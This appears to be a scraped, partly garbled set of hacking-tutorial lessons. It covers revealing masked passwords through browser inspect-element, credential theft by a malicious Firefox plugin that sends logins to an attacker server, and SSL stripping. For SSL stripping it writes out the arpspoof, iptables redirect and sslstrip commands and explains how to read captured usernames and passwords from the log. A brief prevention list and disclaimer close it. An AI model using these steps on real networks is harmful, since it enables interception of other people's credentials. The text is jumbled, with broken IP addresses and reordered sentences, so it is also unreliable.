browser, press ALT –> click Tools –> Click Add-ons 2. On Add-ons page, there is a search box, type firebug on the textbox and click search, or you can go directly to this page https://addons.mozilla.org/en-US/firefox/addon/firebug/. Click install if there is a pop out window asking you to install this add ons. and restart your browser. 3. This is the firebug button. to activate firebug you only need to click this button and click once again to deactivate. 4. Now we try to open a website with log in page, e.g: mail.live.com and input the password. Right click on the password box and choose Inspect Element. 5. Double click the type="password" and change it into type="text". 6. The asterisk password will be shown and revealed 7. What if it is on Google Chrome browser? The steps is the same. Open the log in page, right click the password box and choose inspect element 8. Change the input type="password" to type="text". The password is revealed. Lesson 29: Hacking Internet User’s Passwords Using ‘Malicious’ Firefox Plugin. The title Hacking Internet Users Password Using Malicious Firefox Plugin has come after some students asked about the possibility to gather username and password from browser plugin. The answer is yes you can gather a username and password from internet users when they installed a malicious plugin. According to wikipedia a plugin is In computing, a plug-in (or plugin, extension) is a software component that adds a specific feature to an existing software application. When an application supports plug-ins, it enables customization. The common examples are the plug-ins used in web browsers to add new features such as search- engines, virus scanners, or the ability to utilize a new file type such as a new video format. in this Hacking Internet Users Password Using Malicious Firefox Plugin case, the attacker will change or add or modify or create the main function of a firefox plugin and override or rewrite some function to do some malicious activities with benefit for the attacker. Requirements: 1. Firefox malicious plugin 2. Understand Javascript 3. Social Engineering How to Hacking Internet Users Password Using Malicious Firefox Plugin: The victim browser, which has a malicious Firefox plugin installed, is accessing the internet. As victim browses the internet, the infected browser will also send the data to the attacker server. The data is which website victim visited, and send the username and password as well. the attacker harvester website will grab all GET or POST method and store it in a simple TXT file, but it can change to other database server as well. Make sure you download the plugin only from trusted source (e.mozilla.org/).g: http://addons.Conclusion: 1. . Lesson 30: Breaking SSL Encryption Level : Medium. Set your Linux box to make it can forward every incoming port(enable port forwarding). NetStat SSLSTRIP may need to be downloaded and installed. IPTables 4. but here in this tutorial I will explain how to break the SSL encryption without breaking the SSL encryption using Man in the Middle Attack :-). Advanced Some people ask "Are you sure SSL(Secure Socket Layer) port 443 can be hacked and we know the password sent over the network??"…. Perform the Attack – Man in the Middle Attack 1. Man in the Middle Attack Requirement : 1.how to break ssl protection using sslstrip? What is SSL? actually if you see my explanation about SSL in my previous post.. Arpspoof 3.168. 2. when we try to break the encryption it’s a little bit hard to break.8 . SSLStrip 5. echo ’1’ > /proc/sys/net/ipv4/ip_forward This code will let your Linux Backtrack have ability to forward every packet that was not intended for your machine. KALI LINUX 2.8. Know your network gateway netstat -nr For example i’ve already know that my gateway address is 192. tar zxvf sslstrip-0.3.8" to your network default gateway.9.168. it will now display HTTP instead. Download SSL Strip 2. and is practically will invisible to users.8 a.9 4. and session denial.168. SSL Strip Created by Moxie Morlinspike who provides a demonstration of the HTTPS stripping attacks that presented at Black Hat DC 2009. After finished set up iptables.py install Break SSL Protection Using SSLStrip and Kali Linux 1. then map those links into either look-alike HTTP links or homograph- similar HTTPS links. Install SSL Strip (optional) 1.8. Change "eth0" to your network card that currently connected to the network.gz 3. It will transparently hijack HTTP traffic on a network.8. Be careful if your network has a large userbase connected to it. python setup. the next step we need to redirect all network HTTP traffic through our computer using ARPSpoof (don’t forget to enable IP forwarding) echo ’1’ > /proc/sys/net/ipv4/ip_forward arpspoof -i eth0 192. Change "192. iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to- port 8080 2.8.168. c. b. It also supports modes for supplying a favicon which looks like a lock icon. because it will crash your network and bring your network down.tar. Usually it is eth0 or wlan0. In this tutorial I use arpspoof to entire network. The only way to notice is by checking the URL in the address bar where normally it would display HTTPS. Use ARP spoof to perform Man in the Middle Attack arpspoof -i eth0 192.8 . -Taken from author website- This all happens on the fly. selective logging. cd sslstrip-0. watch for HTTPS links and redirects. We need to set up a firewall rule (using iptables) to redirect requests from port 80 to port 8080 to ensure our outgoing connections (from SSL Strip) get routed to the proper port. https://mail.com. SSL Strip is already running and waiting for victim opening SSL URL such as (https://mail. you will see that ARPSpoof capturing network traffic.com. You can see the plain data of username and password there in the log. When I open the page. etc) As a victim I will try to open https://mail. the whole network will be down and cannot be accessed for a while(it shouldn’t take long time). When everything running well.log :that already captured victim data when they open https://mail. Use SSH Tunneling 3. unsecured hotspot. Prevention of SSL Strip Attack 1.google.3. 2. After SSL Strip capturing enough data. to stop ARPSpoof and SSL Strip just hit CTRL + C. Just take a look to the file using your favorite text editor. then the next step you need to start your SSL Strip by opening new terminal(CTRL+ALT+T) sslstrip -l 8080 "-l" tells the system to listen on specified port. 4. The URL changed into HTTP. etc) minimalize login into your personal account. I expect the url to no longer be in secure socket layer. If you are on public network (internet cafe.live. After you stop it.live. Inside the SSL Strip folder there will be a new file created "sslstrip.com.log" that stores all information that already captured over the HTTP protocol and even the HTTPS.com.yahoo. . this can happen because ARPSpoof didn’t automatically repopulate the ARP tables with router proper MAC address. Below picture is the content of my sslstrip. 5. Keep your eyes open. Don’t get shocked if this application will insure you go to jail faster if you use for an unintended purpose by law.Remember This ! Don't use this for anything other than educational purposes or on a server with permission from a client. .
Copyright © 2024 DOKUMEN.SITE Inc.